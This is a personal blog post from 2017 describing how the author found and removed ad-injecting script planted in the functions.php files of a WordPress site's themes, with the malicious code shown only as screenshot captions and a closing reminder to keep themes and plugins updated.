An Encounter with Malware MW:JS:GEN2

Achindra Bhatnagar
Achindra
Published in
3 min readSep 15, 2017

I am sharing an interesting story that also summarizes last 8 hours of the day! Although this is second time I am writing this blog, since the previous post published without any content, but I have no regret writing it down again :-)

A friend of mine hosts a website for a customer. I was asked to look at their website because it was behaving weird. Every link you click, you have a popup that takes you to some advertisement site. I observed that the website links I click work fine, just that there is an extra popup. So, I started investigating…

It started with the Gut

Gut feeling, given the behaviour, it must be a client side issue and must be something in Javascript. I looked at the page source to find if anything visibly wrong in the headers. Everything must be normal since there is a lot of stuff in there and all was standard stuff.

I searched for “javascript” and after scanning the highlights a few times, I found the link embedded in the page.

Screen Shot 2017-09-16 at 1.10.00 AM

When I accessed these links, they were indeed taking me to the random advertisement pages. So I asked, Where did these links come from?

Exploration

I downloaded their complete site and searched for these URLs and they were nowhere to be found. I tried to open different pages to find that this is getting loaded towards the end of the page before all other scripts.

I disabled all plugins but the code is still there. So, I searched in the database and found Nothing!

Sit Back

Everyone is anxious, trying out all kind brute force methods to search through code and database tables, disabled Themes and Plugins. But nothing. I then sat on my chair swinging and thinking what would I do if I have to build something like this.

Eureka!

All great ideas comes in the toilet, (like my morning tweets from toilet seat)

What if I get my content from an external link and embed it in the page? I had done this in one of my several college projects. I searched for all the URLs in the source code. Then I filtered out all the URLs for the current site, installed themes and plugins. And I found my needle in the haystack!

Screen Shot 2017-09-16 at 1.18.43 AM

Found this above URL in functions.php file in all the themes. I checked this URL and this is where the script and malicious URL is getting embedded.

Screen Shot 2017-09-16 at 1.19.58 AM.png

To fix the issue, I removed all of this header and tried and the issue is gone, but then I also had to remove it from all the themes I had installed on that server.

It’s a Malware!

While this is a java script based malware, I found that it is MW:JS:GEN2 in security terms and it infects in through wrong permissions, outdated theme or plugin or wordpress. It is reiterated, yet again, how important it is to stay updated.

If you notice, there is UA-9664825, google analytics ID. I searched for it and found that it is associated with GoFilmz.com which is a movie site and runs click-ads, for revenue probably. The site is registered by “Brea, California US, New Dream Network, LLC (AS26347)”. Attacker is probably generating click-ad traffic for this site.

Late to sleep… (Tried to report to google ads)

--

--